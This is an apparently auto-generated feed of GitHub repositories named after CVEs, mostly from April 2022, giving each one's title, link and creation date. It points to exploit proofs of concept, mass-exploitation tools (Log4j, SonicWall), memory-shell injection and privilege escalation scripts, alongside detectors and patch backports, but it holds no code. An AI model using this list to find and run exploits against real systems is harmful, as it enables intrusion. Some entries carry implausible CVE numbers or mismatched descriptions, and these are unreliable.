**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-39704](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-39704) create time: 2022-04-26T11:04:14Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0315](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0315) create time: 2022-04-26T10:38:35Z

**PoC for Dirty COW (CVE-2016-5195)** : [passionchenjianyegmail8/scumjrs](https://github.com/passionchenjianyegmail8/scumjrs) create time: 2022-04-26T08:54:16Z

**no description** : [w1023913214/CVE-2022-15213](https://github.com/w1023913214/CVE-2022-15213) create time: 2022-04-26T08:34:37Z

**no description** : [lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle](https://github.com/lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle) create time: 2022-04-26T07:52:24Z

**test dingding** : [w1023913214/CVE-2022-3333](https://github.com/w1023913214/CVE-2022-3333) create time: 2022-04-26T08:05:12Z

**CVE-2022-22947 注入Godzilla内存马** : [whwlsfb/cve-2022-22947-godzilla-memshell](https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell) create time: 2022-04-26T05:48:27Z

**no description** : [lowkey0808/cve-2022-29464](https://github.com/lowkey0808/cve-2022-29464) create time: 2022-04-26T05:28:39Z

**CVE-2021-20038 multithreaded Mass Scanner and Exploiter tool. SonicWall SMA-100 Unauth RCE Exploit** : [XmasSnowREAL/CVE-2021-20038-Mass-RCE](https://github.com/XmasSnowREAL/CVE-2021-20038-Mass-RCE) create time: 2022-04-26T04:38:11Z

**Make it possible to build a vulnerable webmin virtual environment as a container using docker** : [dnr6419/CVE-2021-32157](https://github.com/dnr6419/CVE-2021-32157) create time: 2022-04-26T01:49:11Z

**CVE-2021-43857(gerapy命令执行)** : [lowkey0808/CVE-2021-43857](https://github.com/lowkey0808/CVE-2021-43857) create time: 2022-04-26T01:38:06Z

**JetBrains YouTrack before 2020.2.8873 is vulnerable to SSRF in the Workflow component.** : [XmasSnowREAL/CVE-2020-15823](https://github.com/XmasSnowREAL/CVE-2020-15823) create time: 2022-04-25T19:16:00Z

**A Zeek package to detect CVE-2021-42292, a Microsoft Excel local privilege escalation exploit.** : [XmasSnowREAL/CVE-2021-42292](https://github.com/XmasSnowREAL/CVE-2021-42292) create time: 2022-04-25T18:48:42Z

**CVE-2022-26809 is a vulnerability in Remote Procedure Call Runtime** : [XmasSnowREAL/CVE-2022-26809-RCE](https://github.com/XmasSnowREAL/CVE-2022-26809-RCE) create time: 2022-04-25T18:40:24Z

**Test tool to demonstrate the vulnerability of CVE-2022-21449** : [Damok82/SignChecker](https://github.com/Damok82/SignChecker) create time: 2022-04-25T16:02:24Z

**The RRS v500 application is vulnerable to a Local File Inclusion (LFI) vulnerability.** : [TheGetch/CVE-2022-29597](https://github.com/TheGetch/CVE-2022-29597) create time: 2022-04-21T20:22:38Z

**The RRS v500 application is vulnerable to a reflected Cross-Site Scripting (XSS) vulnerability.** : [TheGetch/CVE-2022-29598](https://github.com/TheGetch/CVE-2022-29598) create time: 2022-04-21T20:14:29Z

**SXF VPN RCE** : [shirouQwQ/CVE-2022-2333](https://github.com/shirouQwQ/CVE-2022-2333) create time: 2022-04-25T10:13:40Z

**no description** : [anldori/Drupal-CVE-2018-7600](https://github.com/anldori/Drupal-CVE-2018-7600) create time: 2022-04-25T08:46:00Z

**no description** : [nanopathi/packages_apps_Settings_CVE-2021-0586](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0586) create time: 2022-04-25T07:58:29Z

**SQL injection in QuerySet.annotate(), aggregate(), and extra()** : [YouGina/CVE-2022-28346](https://github.com/YouGina/CVE-2022-28346) create time: 2022-04-25T08:27:34Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0339](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0339) create time: 2022-04-25T07:09:36Z

**cve-2021-32849(gerapy命令执行)** : [lowkey0808/cve-2021-32849](https://github.com/lowkey0808/cve-2021-32849) create time: 2022-04-25T06:44:46Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2020-0227](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0227) create time: 2022-04-25T06:18:58Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0954](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0954) create time: 2022-04-25T05:13:39Z

**A basic analysis about CVE-2021-35942. SQL injection in Django.** : [WynSon/CVE-2021-35042](https://github.com/WynSon/CVE-2021-35042) create time: 2022-04-25T02:50:00Z

**no description** : [k4u5h41/CVE-2022-29464](https://github.com/k4u5h41/CVE-2022-29464) create time: 2022-04-24T22:40:38Z

**😭 WSOB is a python created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.** : [oppsec/WSOB](https://github.com/oppsec/WSOB) create time: 2022-04-24T18:25:26Z

**My research about CVE-2021-4034** : [antoinenguyen-09/CVE-2021-4034](https://github.com/antoinenguyen-09/CVE-2021-4034) create time: 2022-04-24T14:52:55Z

**POC Code for gaining foothold on a server vulnerable to CVE_2019_15107** : [merlin-ke/CVE_2019_15107](https://github.com/merlin-ke/CVE_2019_15107) create time: 2019-09-24T19:02:19Z

**Zeek script to detect exploitation attempts of CVE-2022-21449 for TLS connections** : [thack1/CVE-2022-21449](https://github.com/thack1/CVE-2022-21449) create time: 2022-04-24T10:59:11Z

**no description** : [LogSec/CVE-2013-2006](https://github.com/LogSec/CVE-2013-2006) create time: 2022-04-24T07:42:14Z

**no description** : [LogSec/CVE-2013-0212](https://github.com/LogSec/CVE-2013-0212) create time: 2022-04-24T06:13:43Z

**Proof of concept exploit for CVE-2021-42697: Akka HTTP 10.1.x before 10.1.15 and 10.2.x before 10.2.7 can encounter stack exhaustion while parsing HTTP headers, which allows a remote attacker to conduct a Denial of Service attack by sending a User-Agent header with deeply nested comments.** : [cxosmo/CVE-2021-42697](https://github.com/cxosmo/CVE-2021-42697) create time: 2022-04-24T05:51:24Z

**Proof of concept exploit for CVE-2022-29548: A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.** : [cxosmo/CVE-2022-29548](https://github.com/cxosmo/CVE-2022-29548) create time: 2022-04-24T06:00:25Z

**CVE-2021-20038 multithreaded Mass Scanner and Exploiter tool. SonicWall SMA-100 Unauth RCE Exploit** : [ExploitPwner/CVE-2021-20038-Mass-RCE](https://github.com/ExploitPwner/CVE-2021-20038-Mass-RCE) create time: 2022-04-24T02:02:54Z

**no description** : [B0nfee/CVE-2022-21882](https://github.com/B0nfee/CVE-2022-21882) create time: 2022-04-23T17:49:59Z

**no description** : [B0nfee/CVE-2022-25636](https://github.com/B0nfee/CVE-2022-25636) create time: 2022-04-23T17:49:30Z

**no description** : [B0nfee/CVE-2022-0995](https://github.com/B0nfee/CVE-2022-0995) create time: 2022-04-23T17:48:40Z

**no description** : [roger109/CVE-2022-26809-RCE-POC](https://github.com/roger109/CVE-2022-26809-RCE-POC) create time: 2022-04-23T16:05:36Z

**CVE-2022-26809-RCE** : [oppongjohn/CVE-2022-26809-RCE](https://github.com/oppongjohn/CVE-2022-26809-RCE) create time: 2022-04-23T16:01:44Z

**no description** : [nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318](https://github.com/nanopathi/frameworks_native_AOSP10_r33_CVE-2021-0318) create time: 2022-04-23T12:43:31Z

**no description** : [LogSec/CVE-2010-2387](https://github.com/LogSec/CVE-2010-2387) create time: 2022-04-23T12:24:23Z

**no description** : [rafaelchriss/CVE-2021-3279](https://github.com/rafaelchriss/CVE-2021-3279) create time: 2022-04-23T12:30:21Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317) create time: 2022-04-23T10:05:37Z

**no description** : [mariomamo/CVE-2022-22965](https://github.com/mariomamo/CVE-2022-22965) create time: 2022-04-23T09:01:22Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2020-0401](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0401) create time: 2022-04-23T08:17:35Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2020-0137](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0137) create time: 2022-04-23T07:02:41Z

**no description** : [ShaikUsaf/linux-4.19.72_CVE-2020-14356](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-14356) create time: 2022-04-23T06:45:44Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0513](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0513) create time: 2022-04-23T05:50:23Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705) create time: 2022-04-23T04:47:32Z

**no description** : [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0337) create time: 2022-04-23T04:41:42Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0327](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0327) create time: 2022-04-23T03:01:52Z

**Repository containing nse script for vulnerability CVE-2022-29464 known as WSO2 RCE.** : [gpiechnik2/nmap-CVE-2022-29464](https://github.com/gpiechnik2/nmap-CVE-2022-29464) create time: 2022-04-22T21:23:57Z

**no description** : [0xAgun/CVE-2022-29464](https://github.com/0xAgun/CVE-2022-29464) create time: 2022-04-22T22:13:45Z

**A python script/generator, for generating and exploiting Microsoft vulnerability** : [BRAINIAC22/CVE-2017-0199](https://github.com/BRAINIAC22/CVE-2017-0199) create time: 2022-04-22T19:10:16Z

**no description** : [ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188](https://github.com/ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188) create time: 2022-04-22T10:24:13Z

**no description** : [nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708) create time: 2022-04-22T09:39:02Z

**no description** : [jones199023/CVE-2022-26809](https://github.com/jones199023/CVE-2022-26809) create time: 2022-04-22T10:21:30Z

**no description** : [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481) create time: 2022-04-22T09:10:38Z

**no description** : [martinfrancois/CVE-2021-36460](https://github.com/martinfrancois/CVE-2021-36460) create time: 2022-04-22T08:33:47Z

**CVE-2022-25943** : [webraybtl/CVE-2022-25943](https://github.com/webraybtl/CVE-2022-25943) create time: 2022-04-22T08:30:55Z

**no description** : [Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166](https://github.com/Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166) create time: 2022-04-22T07:43:37Z

**no description** : [CberryAIRDROP/CVE-2022-26809-RCE](https://github.com/CberryAIRDROP/CVE-2022-26809-RCE) create time: 2021-09-01T09:48:31Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203) create time: 2022-04-22T06:59:37Z

**no description** : [pazhanivel07/frameworks_av-CVE-2020-0218](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0218) create time: 2022-04-22T06:32:40Z

**no description** : [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-0336) create time: 2022-04-22T06:36:57Z

**no description** : [nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340](https://github.com/nanopathi/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340) create time: 2022-04-22T06:24:14Z

**no description** : [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595) create time: 2022-04-22T06:09:00Z

**no description** : [nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183) create time: 2022-04-22T05:28:45Z

**no description** : [nanopathi/system_bt_AOSP10_r33_CVE-2021-0522](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0522) create time: 2022-04-22T04:59:56Z

**no description** : [gudyrmik/CVE-2021-44142](https://github.com/gudyrmik/CVE-2021-44142) create time: 2022-04-22T04:46:54Z

**WSO2 RCE (CVE-2022-29464)** : [h3v0x/CVE-2022-29464](https://github.com/h3v0x/CVE-2022-29464) create time: 2022-04-22T05:19:51Z

**cve-2022-29464 批量脚本** : [Lidong-io/cve-2022-29464](https://github.com/Lidong-io/cve-2022-29464) create time: 2022-04-22T02:01:39Z

**A Zeek detector for CVE-2022-24497.** : [corelight/CVE-2022-24497](https://github.com/corelight/CVE-2022-24497) create time: 2022-04-13T17:12:59Z

**no description** : [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519) create time: 2022-04-21T18:47:00Z

**Demos the Psychic Signatures vulnerability (CVE-2022-21449)** : [marschall/psychic-signatures](https://github.com/marschall/psychic-signatures) create time: 2022-04-21T16:26:50Z

**Pre-auth RCE bug CVE-2022-29464** : [mr-r3bot/WSO2-CVE-2022-29464](https://github.com/mr-r3bot/WSO2-CVE-2022-29464) create time: 2022-04-21T14:47:18Z

**no description** : [nanopathi/system_core_AOSP10_r33_CVE-2020-0409](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0409) create time: 2022-04-21T11:30:46Z

**no description** : [Trinadh465/frameworks_base_AOSP_r33_CVE_2021-0334](https://github.com/Trinadh465/frameworks_base_AOSP_r33_CVE_2021-0334) create time: 2022-04-21T12:22:55Z

**no description** : [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0437) create time: 2022-04-21T10:37:06Z

**no description** : [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160) create time: 2022-04-21T09:36:45Z

**just demo an exploit** : [killvxk/CVE-2021-3972](https://github.com/killvxk/CVE-2021-3972) create time: 2022-04-21T10:25:32Z

**no description** : [c4mx/CVE-2022-22965_PoC](https://github.com/c4mx/CVE-2022-22965_PoC) create time: 2022-04-21T10:17:42Z

**CVE-2016-10924 - Directory traversal vulnerability in WordPress ebook-download plugin(<1.2). PoC + PID Bruteforce in Python.** : [rvizx/CVE-2016-10924](https://github.com/rvizx/CVE-2016-10924) create time: 2022-04-21T09:21:56Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640) create time: 2022-04-21T08:53:08Z

**no description** : [c4mx/CVE-2022-22965_PoC](https://github.com/c4mx/CVE-2022-22965_PoC) create time: 2022-04-21T08:37:48Z

**no description** : [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508) create time: 2022-04-21T08:15:00Z

**no description** : [pazhanivel07/system_bt_A10_r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10_r33_CVE-2021-0474) create time: 2022-04-21T07:22:59Z

**no description** : [nanopathi/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0431) create time: 2022-04-21T07:20:59Z

**no description** : [achuna33/CVE-2022-0265](https://github.com/achuna33/CVE-2022-0265) create time: 2022-04-21T08:24:26Z

**no description** : [c4mx/CVE-2022-22965_PoC](https://github.com/c4mx/CVE-2022-22965_PoC) create time: 2022-04-21T08:20:37Z

**no description** : [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0431) create time: 2022-04-21T07:05:53Z

**no description** : [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0435) create time: 2022-04-21T06:54:34Z

**no description** : [nanopathi/system_bt_AOSP10_r33_CVE-2021-0435](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0435) create time: 2022-04-21T06:37:09Z

**no description** : [tufanturhan/wso2-rce-cve-2022-29464](https://github.com/tufanturhan/wso2-rce-cve-2022-29464) create time: 2022-04-21T06:48:35Z

**no description** : [nanopathi/system_media_AOSP10_r33_CVE-2020-0458](https://github.com/nanopathi/system_media_AOSP10_r33_CVE-2020-0458) create time: 2022-04-21T06:20:46Z

**no description** : [Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509](https://github.com/Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509) create time: 2022-04-21T06:23:26Z

**no description** : [nanopathi/system_media_AOSP10_r33_CVE-2020-0458](https://github.com/nanopathi/system_media_AOSP10_r33_CVE-2020-0458) create time: 2022-04-21T05:28:58Z

**no description** : [0xUhaw/CVE-2022-0778](https://github.com/0xUhaw/CVE-2022-0778) create time: 2022-04-21T04:04:27Z

**WSO2 RCE (CVE-2022-29464) exploit.** : [hakivvi/CVE-2022-29464](https://github.com/hakivvi/CVE-2022-29464) create time: 2022-04-20T21:23:52Z

**This repository contains a PoC for remote code execution CVE-2022-26809** : [DESC0N0C1D0/CVE-2022-26809-RCE](https://github.com/DESC0N0C1D0/CVE-2022-26809-RCE) create time: 2022-04-20T20:54:26Z

**CVE-2022-21449 Proof of Concept demonstrating its usage with a vulnerable client and a malicious TLS server** : [khalednassar/CVE-2022-21449-TLS-PoC](https://github.com/khalednassar/CVE-2022-21449-TLS-PoC) create time: 2022-04-20T20:31:15Z

**CVE-2018-14714 PoC RCE** : [sunn1day/CVE-2018-14714-POC](https://github.com/sunn1day/CVE-2018-14714-POC) create time: 2022-04-20T20:12:36Z

**CVE-2020-36109 PoC causing DoS** : [sunn1day/CVE-2020-36109-POC](https://github.com/sunn1day/CVE-2020-36109-POC) create time: 2022-04-20T20:07:51Z

**Tool which leverages CVE-2021-36798 (HotCobalt) and related work from SentinelOne to DoS CobaltStrike 4.2 and 4.3 servers** : [hariomenkel/CobaltSploit](https://github.com/hariomenkel/CobaltSploit) create time: 2022-04-20T16:36:23Z

**no description** : [yavolo/CVE-2018-6574](https://github.com/yavolo/CVE-2018-6574) create time: 2022-04-20T16:03:00Z

**no description** : [pazhanivel07/system_bt_A10-r33_CVE-2020-0176](https://github.com/pazhanivel07/system_bt_A10-r33_CVE-2020-0176) create time: 2022-04-20T13:17:24Z

**no description** : [pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510](https://github.com/pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510) create time: 2022-04-20T12:29:25Z

**no description** : [0xBrAinsTorM/CVE-2021-36981](https://github.com/0xBrAinsTorM/CVE-2021-36981) create time: 2022-04-20T12:26:24Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0433) create time: 2022-04-20T12:03:35Z

**CVE-2022-21449 Vulnerability tester** : [jmiettinen/CVE-2022-21449-vuln-test](https://github.com/jmiettinen/CVE-2022-21449-vuln-test) create time: 2022-04-20T11:47:55Z

**no description** : [jfrog/jfrog-CVE-2022-21449](https://github.com/jfrog/jfrog-CVE-2022-21449) create time: 2022-04-20T10:23:07Z

**no description** : [Phantomlancer123/CVE-2017-0199](https://github.com/Phantomlancer123/CVE-2017-0199) create time: 2022-04-20T09:07:52Z

**CVE-2017-9841批量扫描及利用脚本。PHPUnit是其中的一个基于PHP的测试框架。 PHPUnit 4.8.28之前的版本和5.6.3之前的5.x版本中的Util/PHP/eval-stdin.php文件存在安全漏洞。远程攻击者可通过发送以‘Contents area.** : [sentinelblue/CVE-2022-29072](https://github.com/sentinelblue/CVE-2022-29072) create time: 2022-04-18T18:59:01Z

**no description** : [puneetbehl/grails3-cve-2022-27772](https://github.com/puneetbehl/grails3-cve-2022-27772) create time: 2022-04-18T17:32:49Z

**Powershell to mitigate CVE-2022-29072** : [tiktb8/CVE-2022-29072](https://github.com/tiktb8/CVE-2022-29072) create time: 2022-04-18T17:08:43Z

**no description** : [ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226](https://github.com/ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226) create time: 2022-04-18T15:24:51Z

**Watchguard RCE POC CVE-2022-26318** : [h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318](https://github.com/h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318) create time: 2022-04-18T15:14:30Z

**CVE-2019-15107** : [f0rkr/CVE-2019-15107](https://github.com/f0rkr/CVE-2019-15107) create time: 2022-04-18T11:25:42Z

**no description** : [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219) create time: 2022-04-18T11:45:18Z

**no description** : [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478) create time: 2022-04-18T11:16:45Z

**no description** : [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0319) create time: 2022-04-18T09:31:22Z

**CVE-2021-44228 Log4J multithreaded Mass Exploitation tool compatible with URL/IP lists.** : [ExploitPwner/CVE-2021-44228-Mass-RCE-Log4j](https://github.com/ExploitPwner/CVE-2021-44228-Mass-RCE-Log4j) create time: 2022-04-18T09:16:05Z

**no description** : [jkakavas/CVE-2022-0778-POC](https://github.com/jkakavas/CVE-2022-0778-POC) create time: 2022-04-18T07:51:18Z

**no description** : [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705) create time: 2022-04-18T06:51:16Z

**no description** : [Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594](https://github.com/Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594) create time: 2022-04-18T06:06:42Z

**no description** : [3SsFuck/CVE-2021-31805-POC](https://github.com/3SsFuck/CVE-2021-31805-POC) create time: 2022-04-18T05:28:52Z

**no description** : [w1023913214/CVE-2022-18852](https://github.com/w1023913214/CVE-2022-18852) create time: 2022-04-18T06:08:08Z

**GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated) cve-2021-22205** : [momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-](https://github.com/momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-) create time: 2022-04-18T04:56:18Z

**A proof of concept of the CVE-2022-26809-RCE vulnerability.** : [F1uk369/CVE-2022-26809](https://github.com/F1uk369/CVE-2022-26809) create time: 2022-04-18T03:45:45Z

**first golang implementation ever** : [qasj/CVE-2021-4034](https://github.com/qasj/CVE-2021-4034) create time: 2022-04-18T01:20:16Z

**CVE-2015-1635-POC,指定IP与端口验证HTTP.sys漏洞是否存在** : [w01ke/CVE-2015-1635-POC](https://github.com/w01ke/CVE-2015-1635-POC) create time: 2022-04-17T16:48:44Z

**PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys.** : [dengyang123x/0vercl0k](https://github.com/dengyang123x/0vercl0k) create time: 2022-04-17T17:00:49Z

**A Log4j vulnerability scanner is used to identify the CVE-2021-44228 and CVE_2021_45046** : [manishkanyal/log4j-scanner](https://github.com/manishkanyal/log4j-scanner) create time: 2022-04-17T11:01:24Z

**List of CVE-2021-*** : [mcdulltii/CVE-2021](https://github.com/mcdulltii/CVE-2021) create time: 2022-04-17T05:56:34Z

**WordPress Elementor 3.6.0 3.6.1 3.6.2 RCE POC** : [mcdulltii/CVE-2022-1329](https://github.com/mcdulltii/CVE-2022-1329) create time: 2022-04-17T05:44:45Z

**Scripted Linux Privilege Escalation for the CVE-2022-0847 "Dirty Pipe" vulnerability** : [rexpository/Linux-privilege-escalation](https://github.com/rexpository/Linux-privilege-escalation) create time: 2022-04-17T04:28:24Z

**Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)** : [TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated) create time: 2021-12-01T20:12:56Z

**Exploit for CVE-2021-22204.** : [UNICORDev/exploit-CVE-2021-22204](https://github.com/UNICORDev/exploit-CVE-2021-22204) create time: 2022-04-16T22:49:47Z

**Repository containing nse script for vulnerability CVE-2022-21907. It is a component (IIS) vulnerability on Windows. It allows remote code execution. The vulnerability affects the kernel module http. sys, which handles most basic IIS operations.** : [gpiechnik2/nmap-CVE-2022-21907](https://github.com/gpiechnik2/nmap-CVE-2022-21907) create time: 2022-04-16T19:13:27Z

**Metabase NTLM Attack** : [secure-77/CVE-2022-24853](https://github.com/secure-77/CVE-2022-24853) create time: 2022-04-16T19:41:15Z

**Laravel RCE (CVE-2021-3129)** : [joshuavanderpoll/CVE-2021-3129](https://github.com/joshuavanderpoll/CVE-2021-3129) create time: 2022-04-16T17:22:55Z

**PoC for CVE-2021-39749, allowing starting arbitrary Activity on Android 12L Beta** : [michalbednarski/OrganizerTransaction](https://github.com/michalbednarski/OrganizerTransaction) create time: 2022-04-16T16:36:48Z

**CVE 2022-22954 - VMWare Workspace ONE Acess SSTI** : [astraztech/vmware4shell](https://github.com/astraztech/vmware4shell) create time: 2022-04-16T15:54:43Z

**CVE-2021-44529 Ivanti EPM 云服务设备 (CSA) 中的代码注入漏洞允许未经身份验证的用户以有限的权限(nobody)执行任意代码。** : [jax7sec/CVE-2021-44529](https://github.com/jax7sec/CVE-2021-44529) create time: 2022-04-16T15:19:39Z

**no description** : [XmasSnow/CVE-2022-26809-RCE](https://github.com/XmasSnow/CVE-2022-26809-RCE) create time: 2022-04-16T14:09:59Z

**no description** : [AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit](https://github.com/AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit) create time: 2022-04-15T19:37:35Z

**PoC for CVE-2021-31805 (Apache Struts2)** : [aeyesec/CVE-2021-31805](https://github.com/aeyesec/CVE-2021-31805) create time: 2022-04-15T16:09:52Z

**vulnerability in version 20.21.7 of D2L Learning Management System (LMS)** : [Skotizo/CVE-2021-43129](https://github.com/Skotizo/CVE-2021-43129) create time: 2022-04-12T21:04:44Z

**7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.** : [kagancapar/CVE-2022-29072](https://github.com/kagancapar/CVE-2022-29072) create time: 2022-04-15T22:59:03Z

**CVE-2022-0185 solution** : [E1efuntik/CVE-2022-0185](https://github.com/E1efuntik/CVE-2022-0185) create time: 2022-04-15T20:56:54Z

**CVE-2022-22954 VMware Workspace ONE Access free marker SSTI** : [MLX15/CVE-2022-22954](https://github.com/MLX15/CVE-2022-22954) create time: 2022-04-15T19:26:56Z

**Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)** : [twseptian/cve-2022-22947](https://github.com/twseptian/cve-2022-22947) create time: 2022-04-15T15:41:36Z

**spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963** : [hktalent/spring-spel-0day-poc](https://github.com/hktalent/spring-spel-0day-poc) create time: 2022-03-26T01:40:04Z

**Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) 支持批量扫描漏洞及漏洞利用** : [jax7sec/S2-062](https://github.com/jax7sec/S2-062) create time: 2022-04-15T11:30:26Z

**Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805)** : [Axx8/Struts2_S2-062_CVE-2021-31805](https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805) create time: 2022-04-15T10:28:29Z

**no description** : [tufanturhan/CVE-2022-21971-Windows-Runtime-RCE](https://github.com/tufanturhan/CVE-2022-21971-Windows-Runtime-RCE) create time: 2022-04-15T09:14:22Z

**no description** : [tufanturhan/CVE-2022-0847-L-nux-PrivEsc](https://github.com/tufanturhan/CVE-2022-0847-L-nux-PrivEsc) create time: 2022-04-15T09:11:43Z

